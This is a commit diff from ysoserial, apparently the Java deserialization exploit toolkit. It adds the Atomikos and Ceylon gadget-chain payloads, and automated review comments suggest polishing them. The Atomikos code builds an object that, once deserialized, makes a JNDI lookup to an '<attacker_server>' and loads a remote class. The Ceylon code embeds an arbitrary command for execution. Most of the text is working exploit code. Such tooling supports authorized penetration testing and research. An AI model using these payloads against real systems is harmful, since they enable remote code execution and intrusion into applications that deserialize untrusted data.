* CommonsCollections8 payload (#116) * New gadgets (Struts2JasperReports - Atomikos - SpringJta) (#123) * added Atomikos gadget payload * added Atomikos gadget payload * naming * added spring-jta gadget * added strutsJasperReports gadget + tests * updated deps list on springJta * fixed authors * renaming * Add new payload in Commons Collections 3.2.1 (#125) * Add Jython2 gadget (#135) This version of Jython2 executes a command through os.system(). Based on Jython1 from @pwntester & @cschneider4711 Co-authored-by: Chris Frohoff <[email protected]> * Add scala and clojure payloads from a couple of years ago (#137) * Add some payloads for Scala * Add new clojure payload affecting versions since 1.8.0 * Fix infinite loop behavior of clojure2 payload. * add CommonsBeanutils2 (#163) * ceylon gadget (#173) Co-authored-by: navalorenzo <[email protected]> Co-authored-by: Stefano Ciccone <[email protected]> Co-authored-by: 梅子酒 <[email protected]> Co-authored-by: Yorick Koster <[email protected]> Co-authored-by: Ian Haken <[email protected]> Co-authored-by: k4n5ha0 <[email protected]> Co-authored-by: supersache <[email protected]>
1 parent
bac4220
commit be6cbf7
Showing
15 changed files
with
847 additions
and
42 deletions.
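--- /dev/null
+++ b/Atomikos.java
@@ -0,0 +1,77 @@
+package ysoserial.payloads;
+
+import javax.management.BadAttributeValueExpException;
+
+import com.atomikos.icatch.jta.RemoteClientUserTransaction;
+
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.annotation.PayloadTest;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/**
+ *
+ * Gadget chain:
+ *
+ * javax/management/BadAttributeValueExpException.readObject()
+ * com/atomikos/icatch/jta/RemoteClientUserTransaction.toString()
+ * com/atomikos/icatch/jta/RemoteClientUserTransaction.checkSetup()
+ * javax/naming/InitialContext.lookup()
+ *
+ *
+ * Arguments:
+ * - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
+ *
+ *
+ * @author pwntester
+ * payload added by sciccone
+ *
+ * This gadget chain was also discovered by pwntester:
+ * https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
+ *
+ */
+@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
+@Dependencies( { "com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1" } )
+@Authors({ Authors.PWNTESTER, Authors.SCICCONE })
+public class Atomikos implements ObjectPayload<Object> {
+
+    @Override
+    public Object getObject(String command) throws Exception {
+
+        // validate command
+        int sep = command.lastIndexOf('/');
+        if ( sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi")))
+            throw new IllegalArgumentException("Command format is: " + command
+                + "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");
+
+        String url = command.substring(0, sep);
+        String className = command.substring(sep + 1);
+
+        // create factory based on url
+        String initialContextFactory;
+        if (url.startsWith("ldap"))
+            initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory";
+        else
+            initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory";
+
+        // create object
+        RemoteClientUserTransaction rcut = new RemoteClientUserTransaction();
+
+        // set values using reflection
+        Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory);
+        Reflections.setFieldValue(rcut, "providerUrl", url);
+        Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className);
+
+        // create exception
+        BadAttributeValueExpException exception = new BadAttributeValueExpException(null);
+        Reflections.setFieldValue(exception, "val", rcut);
+
+        return exception;
+    }
+
+
+    public static void main ( final String[] args ) throws Exception {
+        PayloadRunner.run(Atomikos.class, args);
+    }
+}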
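Review bot: The IllegalArgumentException raised under `// validate command` concatenates `command` directly in front of the format template with no separator, so an input such as `foo` produces `Command format is: foo(rmi,ldap)://...`, which reads as though `foo(rmi,ldap)://` were the expected form. Put the template first and the rejected value after it: `throw new IllegalArgumentException("Command format is: (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>, got: " + command);`. The same guard uses `startsWith("ldap")` and `startsWith("rmi")` rather than checking for the documented `ldap://` / `rmi://` prefixes, so any string that merely begins with those letters is accepted and then routed by the second `url.startsWith("ldap")` test to the LDAP factory or, for everything else, the RMI one; comparing against `"ldap://"` and `"rmi://"` makes the validation match the Javadoc's argument format. Both `getObject` and `main` are entirely within this hunk.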
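--- /dev/null
+++ b/Ceylon.java
@@ -0,0 +1,23 @@
+package ysoserial.payloads;
+
+import com.redhat.ceylon.compiler.java.language.SerializationProxy;
+
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.util.Gadgets;
+
+@Authors({ Authors.KULLRICH })
+@Dependencies({ "org.ceylon-lang:ceylon.language:1.3.3" })
+public class Ceylon implements ObjectPayload<Object>
+{
+
+    //
+    // Probably the simplest deser gadget ever ;-)
+    //
+    @Override
+    public Object getObject(String command) throws Exception {
+        final Object templates = Gadgets.createTemplatesImpl(command);
+
+        return new SerializationProxy (templates, templates.getClass(), "getOutputProperties");
+    }
+}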
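Review bot: Ceylon has no class-level Javadoc describing the chain or its argument, unlike Atomikos added in the same commit, and the only comment (`// Probably the simplest deser gadget ever ;-)`) tells a reader nothing about what `new SerializationProxy(templates, templates.getClass(), "getOutputProperties")` does once deserialized. A Javadoc in the project's `Gadget chain:` form should name the SerializationProxy deserialization hook that invokes the named method on the wrapped object (which hook that is cannot be confirmed from this hunk and should be checked against the ceylon.language source), then the `getOutputProperties()` call on the object returned by `Gadgets.createTemplatesImpl`, with an `Arguments:` line stating that `command` is what createTemplatesImpl embeds. Ceylon also lacks the `public static void main(final String[] args) throws Exception { PayloadRunner.run(Ceylon.class, args); }` entry point that Atomikos carries (it would need the `ysoserial.payloads.util.PayloadRunner` import); if the project convention is that each payload class is runnable on its own, that method is missing here. The opening brace on its own line after the class declaration also differs from the K&R layout used elsewhere in the commit.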